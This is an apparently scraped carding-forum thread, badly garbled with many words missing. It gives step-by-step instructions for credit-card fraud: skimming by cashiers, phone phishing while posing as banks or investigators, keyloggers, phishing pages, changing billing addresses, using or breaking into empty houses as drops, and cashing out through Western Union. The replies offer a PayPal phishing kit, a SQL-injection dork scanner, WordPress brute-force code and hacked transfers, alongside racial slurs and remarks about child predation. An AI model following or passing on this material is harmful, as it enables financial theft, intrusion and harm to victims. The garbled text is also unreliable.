carding non cardable websites with fake scans and other fake documents okay say you come across site that will deliver another house not registered the card but they want verificaton either through phone scans utility bill credit card passport. 
for this you'll want get pay you deal for cheap shitty mobile all fake details say nokia brick lmao you can use spoofcard. 
com your advantage help you. 
hell the person's details you're using local you and you're daring then their home and beige box from there it'd very convincing. 
they speak you over the phone have all details your mind about the item you're carding have some bullshit story you're having sent diff address such family member's birthday and you need there quick possible it's last minute thing some shit like that. 
you're carding multiple sites the same time it's easy get them mixed make sure who calling you. 
for scans and how them check the attachments the end this file they explain much better than could. 
how you use them once you've made them like the tuts have said you then tilt them little bit does actually look like scan. 
make even more believable put some paper the scanner dark shade you must scan and open photoshop and then put the shopped scan the front onto and then the same with the back then send the scans them via mail post. 
same goes for utility bills can got through trashing your own and then edited. 
not use the same designs when making your scans otherwise will become too obvious. 
give you head start mastercards what recommend for for i'm giving you globe hologram image you won't have buy them irc unfortunately all visa hologram pics are shit but i'm working getting good one soon. 
visa hologram pic coming soon carding whilst the job getting cvv cvv through use mobiles believe not giving your information out anyone anywhere not wise choice you can not trust anyone this day and age. 
yes there are carders working the inside places where there are lot people around flashing off their plastic cash and using them freely without care the world. 
the most common places for carder work are brand label clothing stores such limey's charlie brown's and all the other trendy shops. 
ever noticed when yourself someone else has paid the desk with debit card credit card that they bring out keypad from under the desk then put your card into and have the buyer input the pin think again when they take your credit card and under the desk with get the keypad they are doing more than just that just because they're not taking the card and running off with does not mean they're not stealing your information. 
friend dad used card and work clothing store used have piece play doh stuck under the desk and used press the card onto the piece play doh unfortunately began doing too much and because he'd gotten away with many times became careless and got caught out worker and from what know still doing time. 
the moral careful with the play doh method. 
the unfortunate thing you can only get the full info cards the max and you don't know exactly you're pressing over the info another card already put the play doh. 
also you can't get the cvc through this method was just giving classic example from the olden days. 
but there new wonderful invention called cameras video recording and mobile phones and they are even all working the same thing. 
it's best test out and have camera your phone that least over megapixel and allows long enough video recording times. 
the phone set video record and lighting needed and taped underneath the desk for you record both sides the card for all the information you need well being quick you can get lot more than depending how long each recording lasts you may need start more than one recording. 
you need good reason going under the desk get the chip and pin machine make the desk look cluttered and put shit the way everything such coat hangers and various other items you could just flat out bullshit the customer and say that the chip and pin machine the desk isn't working you need get the other one take their card and then under searching the desk and quickly show the camera phone and then get the chip and pin machine and put the card and then hand the customer put their pin normal unaware you have cvv later use when shopping online. 
skimming whilst the job for skimming you'll want mini portable msr reader that can fitted your waistline belt course once again under the desk you're cashier. 
but you'll also want msr writer you plan writing the tracks embossed piece plastic later you can make these yourself but embossers are expensive and it's expensive procedure wait while until you that yourself and buy them from irc careful people like rip with plastics you'll get shit quality you don't watch out. 
you plan just sell the dumps irc then that's fine but you'll still need the pin well you're waiter you can get cheeky peek them putting their pin into the chip and pin device while you keep hold slightly have them put the pin while they're sat down and you're standing. 
it's much easier skim restaurant rather than clothing retail you don't have think out and set much. 
you can keep the msr your front pocket the uniform you're wearing and pretend giving the card clean the sleeve bullshit and say the device won't read while really you're giving swipe into your reader. 
this way the person doesn't even get suspicious because you don't take their card out sight with them. 
guess you could that technique with clothing retail too when you get their card your dirty little hands but peeking for the pin harder you'll have have friend shoulder surf for they're the next register have them use sony cyber shot camera phone and pretend have them talking the phone while really they're recording the person next them putting their pin cybershots are really inconspicuous looking with their cameras and very clear mpixel. 
i'll into detail what with the dumps you have later the instore carding section. 
using carbonless receipts get details pretty outdated method the store you work hasn't gone carbonless the transactions information then you can get most the info from the receipt you get copy for yourself and note down the pin this well when you get. 
trashing trashing for receipts and credit reports pretty outdated although still works ever heard the expression another man's trash another man's gold that's exactly what this. 
you'd surprised how many people haven't heard paper shredder bonfire. 
they just dump their financial records containing ssn's full name address bank credit card number cvv cvv etc. 
all forms people couldn't bothered dispose properly because they thought they were just old records. 
again carders wok the inside again for when they want trashing lot janitors wear rags but you'd surprised how secretly rich most them are along with the other shit they steal from work well. 
but also from this there not enough info for you the forms then there definitely the phone number the mark the form that they've scrapped almost always and not then there enough info their look them the phone directory. 
then course you use social engineering skills over the phone get the extra info that you need. 
you know store that not carbonless then trashing the bins the back the store for the receipts with the credit card details. 
phishing over the phone phishing over the phone for details ever had telemarketers ask for your credit card info over the phone this you haven't already hung just hearing nigger paki the phone chances are they're carder. 
believe not there are people actually stupid enough fall for these obvious scams. 
even more people fall for this they believe that the caller from the credit card company itself part the secret service credit fraud investigations the fbi cia and police have nothing all with credit card fraud believe not. 
you sound professional part important group such investigations then people are more likely comply with you they believe that their card has been used for credit fraud purposes and have give their credit card info and billing address for verification. 
the best time call the mark when they are work it'll take them surprise and they'll wanting get sorted asap that they can get back work. 
also it's serious then the secret service don't wait for you finish work before they question you. 
play along well the part you're pretending. 
some social engineering skills are required and you must gain the experience lying people yourself. 
before calling the person find out much information about them you can. 
you've stolen from someone personally you can call them pretending their bank and tell them there has been some suspicious charges made the credit card from places such south africa nigeria turkey russia places like that get them confirm their details milk much you want out them ask them bullshit security questions such their mother's maiden name address etc you may well it'll make easier get cob for you use. 
you can also get their pin out them you want well either straight out asking them confirm crafty and after you've told them verify their pin you're putting them through different department then play some cheesy music down the phone for few mins have female voice recording use vocie changer asking them input their pin their dialpad this won't suspicious get these recorded they can decoded with dtmf decoding hardware software later although it's expensive. 
guessing dtmf tones pretty easy too but you need know what each tone sounds like it's preferred use decoding software ensure you have correct. 
you try hard enough you can get full info about anyone over the phone suggest using spoofcard for this. 
keylogging for cvv hardware keylogging first all it's best you use hardware keyloggers here that you put into the keyboard computer belonging area where lot people are going online lot and logging into mails ebays paypals etc pretty much giving you enough info for you searching through you get their mails maybe you're lucky enough get someone who buying something online anyway. 
get the keyloggers and come back within days time and collect the keylogger after doing some browsing yourself not look suspicious just coming and then leaving few seconds later. 
course you could set one business and the classic call and some social engineering from the credit card company secret service and have them the bank online and have them log verify maybe even have them log fake bank online made yourself that will collect anyone's info who logs. 
carding instore instore carding the act skimming credit card and writing the dumps and track piece plastic and then either cashing out the atm shopping for goods instore long you have the pin well through whatever method you choose use. 
how it's done through the use thejerm software any other magstripe utility software thejerm the best use. 
and you like this. 
hit defaults leading zeros box. 
hit bpi set track density box. 
hit loco hico coercivity box depending which you want. 
input your tracks without the symbols because the program already does for you. 
hit write card and swipe your card. 
usually read card afterwards make sure everything went. 
shopping download thejerm was member this site and came from there don't worry about not being safe used this software lot back the day. 
now how you should act when you carding instore pretty much common sense but some people get caught the moment with nerves cockiness just too much weird amounts excitement. 
simple what you make sure you know the pin for the card you're using before you don't stuck the counter trying remember. 
you're going carding expensive goods then dress smart for the occasion wear brand named clothing that you've previously carded even suit. 
would look suspicious someone with hoodie going into store and buying louis vuitton watch walk with style. 
when you instore you act like you are using your own card because essentially that's what well now anyway lol looking shifty and don't look the fucking cameras the cameras mean nothing anyway they don't know your name where you live they're not being watched half the time stop worrying about the fucking cameras remember you're doing nothing wrong. 
when you don't rush take your time browse around some other items. 
find the item you want card and even ask the employee simple questions about it's comp just ask questions about certain specs and it's good for playing video games. 
you'll most nervous the checkout just act normal you always have been don't make too much small talk but polite and civil. 
once you have the good sin your hands don't bolt out the door just say thank you and then casually walk out the door get your car and then celebrate all you want. 
carding over the phone okay all not dumb fuck now not call from your own phones all. 
for extra lulz you could use beige box and call from someone else's phone but that's totally different game all together and also major felony agains tyou the chance that you get caught we'll keep simple and use payphone it's not risky phreak these but the only recent red box tones have are from the year and i'm pretty sure they'd have changed the system again. 
bastards i'll check sometime though call them. 
not put stupid voice all the salesman woman will know and it'll cause for investigation during the mailing the goods the requesting them. 
just calm cool and talk them you normally would you were ordering with your own card. 
they'll ask for name name appears card phone number billing address expiration date method shipping and the product that you want buy. 
also when trying not seem shifty sure ask questions such they can deliver the next day class and they can order your relatives house that can there for their birthday maybe even ask they can write message with the gift well your behalf. 
the next day postage said that they have less time look details the order. 
some cards will have difficulty shipping any address other than the billing address but doesn't hurt try. 
they start question you then just answer the questions and talk your way around the situation with your social engineering skills don't just run away from the questions hang straight away otherwise that cause for suspicion and they may investigate. 
all goes well you should have your item choice delivered your drop location house someone else's address who you don't know and call them saying that you called the store and they've sent the package the wrong address and still sending there and ask them they could kindly keep and sign for the package and you'll pick after work this last resort and only tried you're good talking people which you should you're carder. 
recommend checking out the section drops later this text. 
recommend using spoofcard for verification over the payphone they need verify they won't send without some verification which usually the case. 
irc services provided irc irc the main gathering for fellow carders scam artists and rippers. 
put nut shell irc the black market unlike craigslist and ebay which are just black markets. 
you can get anything illegal off irc from warez details which what want. 
concentrate carding though you can buy cvvs cvv ssns utility bill scans scans cob service get someone call the victim's bank and get the billing address changed your drop payment for using someone else's drop and then sending you spyware fake scans dumpz phisher pages the list really endless there are lot advantages using irc networks and channels which i'll into now the channels are often underground and not known many people they're harder stumble upon some random guy. 
the messages can encrypted they can't read anyone happening the network sniffing the traffic. 
this makes harder for investigators uncover. 
easier and quicker communicate with mass amounts like minded people. 
variety channels one doesn't suit you there are millions and new ones being made every second guaranteed. 
and course varity services you need something you can bet someone from the other side the world will willing share and sell you. 
there are lot disadvantages though irc the equivalent backstreet alley you'll fine you stay cautious here's what you should weary viruses you don't have strong anti viruses and firewalls you will get infected norton shit kaspersky and nod are what you want not accept random. 
exes any file for that matter easy get ripped off choose your forms payments and who you deal with wisely how find carding channels will not too much into this there are secrets between fellow carders which like people interested enough find out for themselves here the most commonly asked question get asked bies and fellow carders where you find these channels i'm being totally honest the best place find out about them through nigerians bullshit that where found out about lot the carder channels used also how found out about forums and their ircs too such cardersplanet darkmarket etc. 
how found him out was just normal scam bait was doing wasn't long one but the end tried phishing tried back and had laugh about was straight with him and told him wanted get deeper into the game looked his type people and wanted get rich successful also shared the double claim secret about paypal with him which got him trusting little bit then sent invite cardersplanet this site was full nigerians. 
eventually went the irc admittedly got ripped few times then started vending myself under various diff nicknames then moved onto different sites like darkmarket and cardingzone when i'd got invites for them although cardingzone shit it's good get the irc for starting off you'll get invited better forums the more you hang out irc trust. 
don't ask for invites cardingzone was banned for ripping didn't rip anyone angry the quicker way use these and search for certain keywords hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links ircarchive. 
info hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links and course don't forget google. 
i'm only going give you one clue for searching through google for carding irc and that word undernet. 
fellow carders don't like revealing their ircs and for obvious reasons. 
advice find scammer through mail and chat him witty with but respectful fellow fraudster. 
vendors and how approach them vendors are the people irc who are selling and providing the services for you. 
there are certain ways you should speak vendors otherwise they're going rip you remember this the black market this just like going random drug dealer the street and not knowing what you really want what you're getting into you'll get ripped off. 
ask many questions possible what you want know you're buying cvv ask see proof their details working get them make small purchase somewhere they should show you before and after and the limits that are there the card there are methods out there checking your balance you can even get through text sms. 
this market remember there are more people that will willing buy from that vendor it's open for all you can get full load info including dumps for low drops usually for someone saying higher prices don't afraid haggle down these prices little bit lower. 
cobs for little bit higher ranges because the vendor needs get full info someone and then change the billing address through the bank where ever your drop. 
now when you the channel don't fucking say request anything shut and see what the vendors are saying they have offer and then send them private message and talk them. 
any vendor messages you trying push onto you buy from them then they're most likely ripper however don't piss off the rippers assume someone ripper because you never know who going there help you out later down the line who might pissed off enough fuck you over. 
can't give any big advice not getting ripped irc because you don't personally know anyone there all you just have take your chances expect get ripped your few times going there just don't them again because they get away with once they'll definitely try again you back them. 
not buy any bug western union bug massive ripper technique which bullshit. 
the bug used work but was patched time ago most the time now you'll get nothing you'll end with rootkit your comp. 
rippers always say ridiculous prices for these too such but someone says lower prices it's still bullshit and most likely rootkit trojan keylogger going installed your machine while you get some useless program that does nothing. 
ripping easy hell not much photoshop skills needed really either. 
bullshit and say you're selling full info you're getting the info from. 
com any credit card gen program course they don't fucking work they want see proof just use your own legit another stolen buy something and show them proof you buying except photoshop the details that which you're going giving him later. 
take payment through western union only since gold isn't around anymore then just send him the bullshit info. 
they want the report their phone via sms then just spoof text with sms bomber saying some bullshit reports. 
then get the payment via. 
get victims you message them message out the whole channel and then random buyers look for ones requesting. 
bug seriously this bullshit all people are doing are showing buyers fake screenshots made are actually making quick programs themselves and taking screens them and then selling them although essentially they're useless. 
you want this but you want actually send them file well but bind keylogger trojan not only can you rip them out their cash buy your infection but the info you get from spying them will much more well ranging from their info other stolen info you'll have backdoor what they and can exploit. 
you can't bothered making fake screenshots then get them from other rippers trying sell them get them show you pics vids and info then use for yourself and rip some. 
phishing for change billing billing address the details used for person's bank account and most often their credit cards and everything else too this includes their phone number too. 
what change billing cob nutshell changing the billing address registered the card your drop address you're gonna using. 
when you want card big various online websites the orders will look more legit that you're not sending else where other than the one registered the card obviously after you've changed the billing address meaning the delivery your goods will quicker and will require lot less verification. 
most the time you change the billing address over the phone but some banks will let you online when you phone change you use spoofcard. 
com the pay you mobile phone you're going using when carding beige boxing when changing the billing address you need know much info possible about the person's billing address you're changing because the bank going ask you security questions you set such mother's maiden name before they change. 
you can phish for details over the phone see the phishin over the phone section above however it's best use keyloggers and phisher pages for this with mix over the phone. 
use through phishing pages methods here including over the phone one isn't. 
the method without the phone just send ton mails out random people and send them html mail telling them they need update their information before the account suspended their account with the bank will cancelled you have them phisher page off the template and the phisher pages requires them answer security questions like their mother's maiden name their pet's name you know those type questions. 
another method call them pretending the bank and saying there have been different ranges logging their account and they need confirm their details online link them the phisher page and have them fill the details have the phisher page redirect the actual online bank's login page then ask they've done that over the phone tell them wait minute while you confirm and check all out say it's all clear and tell them log they'll think nothing and you now have the answers their secret questions which you can give the bank itself when you change the billing address. 
use through keylogging this favourite method and what told last night irc. 
you have hardware software keylogger set someone's comp use sock proxies when logging into their online bank account and then change their password call them pretending the bank and then get them the actual online bank link and fill their forgotten password options answering secret questions course get them your phisher page and fill the details this you want add more fields get more info then pretend checking all over then change their password again some random letters and numbers and give them log back doesn't matter because they're keylogged and you'll get their new login they change the password again anyway you'll have all their info logged down too for you answer your questions when you call the bank. 
best time all this around the day the month people usually get their credit reports the start every month this will give you plenty time card enough for the remaining days until they see they're not getting their reports coming them anymore you're crafty you can pretend have cancelled the online bank account for them after they've gave you the info you need know used this method and keep going without them knowing. 
you need much info possible when calling the bank change the billing address. 
drops and what you need know about them drops and what you need know about them what drop locations are and what they used for well simply drop location abandoned house any house that not under your name any your details. 
you can lead young children into these make sexy time with them get items delivered them that you want one else find about risking finding just use squat you have where else. 
basically they are used ways keeping your nose clean and are used mostly scam artists and sex offenders. 
how find drop location there are many ways finding drop location for use whether temporarily permanently although suggest swapping and changing locations because main last one used got raided broken into and boarded and too hot use will suggest ways how you can find some for you use. 
one final tip don bother going for houses that are boarded the front where visible passers okay round the back boarded way just mentioned you can about many different ways but one the ways the way prefer about you should looking around some older housing estates and more ghetto areas could also tie with the sob story you feed paedophile child predator you are possibly scamming. 
for example derby there area called sinfin but now there parts and they are new sinfin and old sinfin. 
old sinfin the are you would want because older most likely alot more houses abandoned deemed unsafe bullshit. 
you were lucky like once were then you could ask around your mates there are any empty houses their area. 
there are then you luck and can even have your friend keep tabs and watching over for you and give you details you can keep all under wraps and safe. 
may alot riskier with neighbour hood watch morons and nosey neighbours but still ideal and little bit less suspicious than the abandoned houses the older estates and this because the older estates usually have all abandoned houses close where the odd one out covered with street filled with inhabitants will seem less suspicious the postman. 
way now this temporary way finding drop location but sometimes effective ways and means getting what you need but has bit more risk and personally way have never used even till today. 
have you ever been eavesdropping conversation between neighbour and one their family member friends been down the pub and heard the common muck chavs boasting about holiday they are going away for however long they say they going away for well listen out for these type conversations. 
because them away holiday means the house most likely going empty for however long they going away for. 
you already know where they live then that great the job made easier you know their first name and surname then look them the phone directory and find their address along with the number. 
you don know where they live their name then just listen out see you can hear their names come conversation just remember that the pub most likely local that they live you could easily find out following them home and seeing. 
way possibly the safest easiest way finding and quickest way get drop location. 
most areas have houses for sale right houses that are for bidding right well they have website with full list your local area that have houses for bidding and for sale. 
for example would search and look the list their site. 
all these houses are empty and often not have sign outside them either they then just take down and hide somewhere for the time being. 
the advantage using the lists find the drop locations use will usually say when the bid the house has been sold this lets you know that will not ideal use that certain house now most likely inhabited and will have the houses there that are still being bidded and that are still for sale these are the ones you want using. 
the best thing about this though that you have full list many different drops use like said earlier best switch drop locations and use many different ones and updated with new ones coming and tells you full which ones are over and not usable. 
you just need know your agencies for housing and find their website. 
obtaining and using drop locations you probably thinking now got found one that great and everything but how the fuck keep secret for way this much obvious that you not tell anyone except your partner you doing team bait and trustworthy friend keep tabs you are doing bait your own and also the paedophile but only when asks. 
but there alot more than that also maintaining your abandoned house and making the postman think someone living there. 
appearance isn everything all any case and isn for this either but course you try make yourself look best you can. 
the same principles are applied keeping abandoned house you should atleast try get new lock put the door which you will also have key for just that any druggies there before you then they will have tougher time getting course ideal you don get somewhere known druggies but this example what use could have but also there fucked lock door then pretty damn obvious only low life scum some criminal are using the place buy new lock for the door and get fitted whether you yourself get assistance from friend who knows what they are doing. 
now for overgrowing plants and weeds you can only much without being suspected. 
not use lawn mower use clippers and hack short you can. 
best get all this done when everyone work during the day time but reality isn ideal all and most criminals don tend bother with this. 
instead they will make seem someone but just too ill anything with the garden just lazy fucker. 
they this often writing note and sticking the door leaving the floor near the door saying something such milk today please not please leave packages post office. 
write few letters yourself aswell ready come the same day the parcel this will make look like you get mail and not just the one off suspicious package now and then. 
now alternatives you can either get the abandoned house and take the mail from the mailman while acting like you live there you must look the part lazy disabled you have ingrown plants your garden you can leave note saying take any packages the post office for pick because you are work something along those lines. 
one final rule not and out the hideout everyday whatever visit probably times week. 
way now there are ways about this you can either just get the house early the morning little bit just before the postman arrives and the house outside pretending you just about leave and then sign for the package you need and collect off the postman and then your way after gone. 
you good bypassing alarms have guide burglary the house has alarm then you could bump key night time not recommended during the day time the day before when everyone else will work aswell and hide out there for bit hell even take some food that left the fridge and feed yourself since you spending the rest the day and early morning there. 
basic rules are don have too loud all you then put head phones into the that old model and leave everything how was left say upstairs incase any neighbours anyone looking after the house while the owners are away come then you have time hide. 
obviously package you don have sign for then you can stick note the door early the morning before the post man comes saying leave round the back what ever excuse you wanna make. 
way easy just previously except you don have cautious and often the alarms are disabled for that time being anyway you don have worry much you bump key into. 
also stated previously this guide there are any for bidding for sale signs then take them down and just get them out the way. 
you can even this one the night before instead day time because one hardly going watching over this unless neighbourhood watch area which case you chose the wrong area anyway you dumbass. 
some basic tips keep mind there before the postman can stress this enough too fucking obvious you late. 
when signing for packages you need then sign fake signature the sig can any made fake shit with your hand that you don write with harder trace incase things tits later down the line. 
take anything any guide with pinch salt things may different circumstances for you and your situations guides are used basis. 
also will say the main reason use sock proxies sock proxies can receive and send most types internet traffic such mails java flash etc sock proxies are more private well and much more secure. 
socks traffic anonymized sent out and the incoming traffic filtered. 
you can run most programs through socks easier well. 
bear mind it's wise disable java and flash and have your cookies cleared before and during use the proxies they can reveal your identity. 
disable javascript until you need use usually when submitting info. 
you can find socks proxies online scanning them see which ones are still high anonymity and are working done through certain scanners you find online. 
use accessdiver check all proxies from the lists got. 
ever get log for anyproxy again decide start carding again then i'll sure share some lists sometime. 
infact you can actually buy them off the anyproxy. 
net website except they're cheaper irc. 
extra tip about drops you can order any address you want really call them saying they got the address wrong and are sending there instead say you live street that sounds similar theirs ask they can sign for and keep ther euntil you can pick after work. 
this the best method. 
updates think should add the updates posted another thread this one well it's some need know shit. 
nothing here outdated but this additional needed info. 
carding isn't easy unless you have full details and get them all changed even then they may bring red flag depends the site you're carding. 
easier for example i'd card people who live the same country only just make the job easier. 
why iin bin one the first things they check now. 
unless you steal all their details and call the bank and tell them you're going abroad otherwise all transactions would just stopped. 
get the cob address changed also obviously this still absolutely needed done avoid the top red flag. 
that case it'd only good for instore carding and you'd phished the pin from them you're buying from irc get full info. 
simple way keep your only country and you'll have less work and trouble coming your way. 
you're going card then card big but not the most expensive thing stock obviously don't fuck around with multiple small purchases. 
identifying the place the card was issued from can done through various methods hidden content you must reply see links hidden content you must reply see links name few. 
this will help you pick out the phished cards and which ones are use you. 
now wasn't really specific about checking for valid cvv i'll tell you that now stop you wasting your time and keep this thread alive for further information and input. 
now there are loads sites you can use this trick test cvv valid don't mind giving you one. 
hidden content you must reply see links the way goes most sites with this trick choose any product all and the checkout give the real cvv info but incorrect billing address. 
gives avs mismatch error and can't match the address the cardholder means it's valid. 
tells you the transaction has been declined then your cvv invalid. 
don't use yahoo wallet for checking them tends stop lot cards working later. 
just thought i'd add some more stuff about instore carding because someone know had error pop one his cards today because his dumpz one the cards had died. 
this isn't usually problem because this person used skim for his own when was easier but now buys them from irc instead. 
when you buy dumpz from vendors and are regular carder there will times you're carding instore and have errors come the point sale. 
now because chose dumb nigger cashier this was easier get out keep mind for nigger cashiers younger people and dumb women. 
got the worst error come which was call for authorization. 
now you not want them this all you should make clear you don't have much time for this tel them you'll call the bank tomorrow and ask them try another one your cards. 
there are many other excuses well but this was the one the person know used. 
you must your hand out insist you want the card back whilst talking them most the time they won't know whether give you back but will give you back when put the spot. 
you don't have another card just say you will call the bank about and come back tomorrow. 
the key this however remain calm. 
then give them another card. 
you'll get this eventually you have good dumpz your card the limit has end somewhere get good iin make more money. 
before hand you should make out you're not sure how much money the card hope have enough money cover this when it's declined just stay calm and give them another card and tell them you think the limit must gone that one you had feeling that was going happen laugh off. 
you don't have another card hand say you'll back soon and you're going the cash point. 
there's many other merchant error codes and won't cover them all linked them another thread somewhere when kirby was mod but once you have practice bullshitting with these errors you'll begin getting good it's all pretty much the same action you should take anyway. 
now you're probably thinking you have the pin well then why not just cash out the cash point and then pay cash you can only draw out within hours most cards. 
also you're carding expensive goods then have some other which matches the name the credit card they'll ask for this majority the time it's expensive goods. 
sometimes the guy know has been able get away with just having fake business name tag whipped. 
this won't wash you're carding rolexes gemstones. 
it's best have another form fake like driing licence something like that. 
cob's means change billing. 
there's couple ways online phone. 
alot banks only need ssn and dob lookup for them will sometimes. 
little advice not card hours after you changed the billing. 
wait about days maybe week. 
bin bank identification number keep logs them you found one that made you save and get again. 
this one the most important things carding and make sure you keep the gold yourself. 
western union yes possible but it's pain the ass. 
you need try and try. 
and keep trying til you discover the treasure. 
make sure you get good credit reports. 
i'll tell you one thing though usa suck ass. 
recommend the good one's germany denmark sweden greece. 
but some usa bins are still good just look. 
he's right about the cob. 
takes while change now get changed early into the month you can the usually good enough for the guy know. 
iins are the most important now indeed you want make good profit and not get busted limits. 
iins aren't that bad but the best are germany spain and turkey from what i've seen far. 
i've got huge list iins which i'm little reluctant share. 
for western union i've heard you need lot lot countries but the it's not too hard all. 
get some sock proxies and make account online. 
add the card details and the receivers details then through the process. 
all goes well they give you mtcn money transaction control number. 
call them confirm and answer their questions about why you're sending the money and you know them. 
usually give the excuse that i'm job agent and it's his weekly pay. 
they ask other qustions like your. 
this why you need good phishing make sure you're buying fullz. 
they'll also ask the name the bank that issued the card see the bin iin checkers linked earlier. 
i've heard some people being asked it's their first time making transfer through from credit card. 
this what catches you out confirms the whole thing just say yes it's chance. 
then agent with fake the contact details you gave the reciever you've got trustworthy person pick then give his and get him pick. 
the shit thing you can only send each transaction and only month. 
that was with iin i'm not sure it'd different with another card. 
western union good for cashing out but it's not worth all the stages and there are tons easier ways. 
the way you're phishing for fullz you should now ask this question because the banks have upped their security since july. 
what the and character your secret password phishing over the phone while using spoofcard works handy with banks well and pretty fun while you're playing some downloaded office noise the background well. 
they vary that question you can get the whole password like you should aiming then it's easily done. 
since i'm feeling generous i'll tell you that amazon extremely easy card. 
only site that's easy card but you need make acocunt the site too just keep using sock proxies and sign all the card holders details and put the billing addresses there. 
they allow shipping alternte addresses still and will leave around the back dry out the way place there one there collect. 
easiest place card far they tried making more difficult having sign the website. 
don't trust vpns much all. 
main reason being shadowcrew. 
that was sad moment for all fraudsters but good lesson was learnt for those not the scene that time you never put all your trust your eggs one persons basket. 
when was mod bad ideas there was some retard flooding the forums everyday because called him out trying scam others off and advertising his shitty fake services all his posts looked the and turns out the vpn was using was operated someone i'd done alot vending with the past and helped each other out. 
this guy was more than willing give all traffic details the guy using his service didn't but certainly threatened this dumbshit didn't stop spamming and fuck off. 
vpns are not dependable there are few trusted ones out there but shadowcrew just proof that anyonecan turn any time. 
mister illusionist wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links cool bro thax. 
let see this thanks. 
thanks for the info bro. 
the soul man respect you. 
want know about this. 
this shell encoded fopo. 
bond benzthanks bro wrote free working php script check valid emails and registred with paypal. 
impressive work very good. 
though professionals and security companies have been dealing and fighting back with the ransomware threats security professional jada cyrus has compiled ransomware rescue kit ransomware removal kit and made available for free online. 
ransomware removal kit download for free the ransomware malware removal kit supports decryption tools for different strains ransomware variants along with instructions how perform the necessary tasks. 
spokojnie bez nerw niczego nie wrzuca jestem jedyny tym forum polsku. 
marcin jeste jak znalaz forum. 
denis wrote white wrote paypal scam new features indetectable anti bot this scam allow you get full victims info logins email password personal information full name date birth billing address credit card card number exp cvv secure password bank details account number password how use upload paypal. 
zip cpanel shell freehosting not allow you get result your email make sure use good hosting hacked cpanel then open this files login. 
php they are located secure home update and find the email white live. 
com and replace with your own email and here some paypal letters some paypal letters you may need. 
you can make your own paypal letters you can code with html. 
this scam for professional only not for noob. 
you want spammer you should first hacker. 
you should have tools like mailer smtp cpanel shell mailist begin scamming have fun. 
deadmanindia wrote thanks bro nic one share cool welcome buddy. 
thanks for share bro bond benz wrote sql scanner. 
takes search phrase and searches them google bing with differnt testing methods. 
great tool for bug bounty hunter. 
features code has dorks also supplied download dork list with dorks scan methods error searching and error recornition custom search amount most scanners are set search and return only sites set your own limit has great supporting community for all your needs. 
great tutorials and help best thing about this scanner virus free you download this anyware else beside from here getting off out forum then you risk your computer download this from the source not party features after alpha beta test testing browser. 
all protential vuln sites will listbox for you check see they are vuln. 
now have added linux script. 
net projects files linuxinstaller this install the scanner work linux using mono installs opt and desktop you have wine you have right click and select run with mono runtime open terminal and type mono. 
add save and load own dorks now download. 
hacked western union bank and paypal transfer available. 
need western union bank and paypal transfer hey are you tired getting your money transfers blocked all know bitch card. 
they have too many verification steps and most seller aren't actually skilled carders like they claim. 
the flaw within verification system. 
money order stolen they can check that with the serial number. 
would you like show you how say fuck off westernu and moneyg showing you how get your money transfer easier you will receive mtcn and other transaction codes few minutes after payment confirmed because will transfer online. 
when transfer for western union need the following details from you. 
suggest you use drop fake info and id's for verification when picking money. 
first name last name your country your city payments western union can now have option user secret security question where you not need passport etc. 
just have secret answer. 
you want this then just tell message before transfer. 
you just have present your mtcn money transfer control number and provide both the question and answe western union rates for btc for btc for btc for btc for btc for btc bank transfer rates bank transfer for btc bank transfer for btc bank transfer for btc bank transfer for btc bank transfer for btc paypal transfer now offering direct paypal funds deposited straight into your account. 
this will work for any paypal account worldwide. 
paypal deposits done through external payment processors. 
these funds are not from hacked accounts. 
all need your paypal email please leave notes when ordering. 
paypal transfer rates pypal transfer for btc pypal transfer for btc pypal transfer for btc pypal transfer for btc pypal transfer for btc you contact via icq email maclini yahoo. 
small nice tut bro good. 
thank you very helpful. 
alslam alikom hello all today will show you how download and install glype proxy script and use this script one the most popular php scripts that used reverse proxy this script have many features like prevent specific country also can edit useragent cookies etc. 
with curl support website with free space now download script from their website download glype proxy click this button start downloading now need website with free space upload script and install there are many hosts can give you free website with space too like. 
com now let's see how will install the script and use. 
you can download this video and watch download and install glype proxy any question addition will welcome good luck elsyad. 
thanks for this hope works thanks for this hope works. 
how modify the drivers for performing the stealth man the middle attack using hole vulnerability. 
the requirement send forged arp message encrypted using group key wpa network. 
thanks bro bakal kacak. 
nice thank you for sharing mate. 
hope this will useful. 
really wanna check this out thanks bro. 
i'd like take look this thanks. 
tanks bro ill check out. 
guys there some rat for linux friendly gui. 
hell you crack this simple program this trial. 
exe score publ here. 
thank you for the tools. 
wrote table width guys today would like share method how verify your paypal without using your own credit card. 
you need follow exactly the guide written this ebook you will success verify your paypal using this method. 
download cheers mike table. 
codefire wrote for password cracking you can choose two different methods. 
the dictionary attack much faster when compared brute force attack. 
there another method named rainbow table similar dictionary attack. 
order achieve success dictionary attack need large size password list. 
here the list passwords free download url you didn't get success using the above password list then you can get the uniqpass dictionary file from. 
indent uniqpass large password list useful for use with john the ripper jtr wordlist mode translate even more hashes into cleartext passwords. 
while have had good success rate with our standard password list passwords. 
realized the list can made more useful and relevant include commonly used passwords from the recently leaked databases belonging large websites. 
result have compiled millions unique passwords into uniqpass. 
indent uniqpass available for purchase only. 
see preview uniqpass from these. 
get the uniqpass dictionary file from here url. 
thanks thanks thanks thanks. 
thanks for this leak bro needed this. 
very nice share will put great use. 
enjoy and don't forget repo code use python wordpressbf. 
txt php code usr bin pythonimport urllib urllib import cookielib sys osimport timeos. 
system 'cls' else clear demo ''' wordpress brute force python script made love tiger rtys gle warri website. 
info use python wordpressbf. 
txt ''' print demosites sys. 
argv def bruter sites passwd opener sites. 
time sites redirect else redirect wpcms urllib. 
urlencode 'log' uname 'pwd' passwd 'wp submit' 'log in' 'redirect to' redirect 'testcookie'. 
request wpcms box opener. 
read 'edit' box time. 
time print print print website sites print username uname print password passwd print password cracked str print print. 
exit else print trying. 
passwd except exception print passthreads open pwd 'r' password. 
for passwd password threading. 
thread target bruter args sites passwd opener. 
hey you have any idea who made. 
php also thanks for the upload. 
webr wrote hidden content you must reply see linkshello. 
thx biokinetix lets have look. 
codefire wrote android android android wps wifi wps wifi vulnable vulnability android android everyone wps android android wifi wps abailable apk wep wpa wpa wps. 
android root wifi wps ita vulnable vulnable wps wifi vulnable. 
mofos iknowthatgirl publicpickups great thank you. 
does this work with wpa. 
sweet sent from iphone using tapatalk. 
there google dork for finding this version whmcs sites. 
has anyone tried this other sites. 
thnx dude i'll try. 
let see that trick. 
let try and ill get back. 
nice post this helpfull good post. 
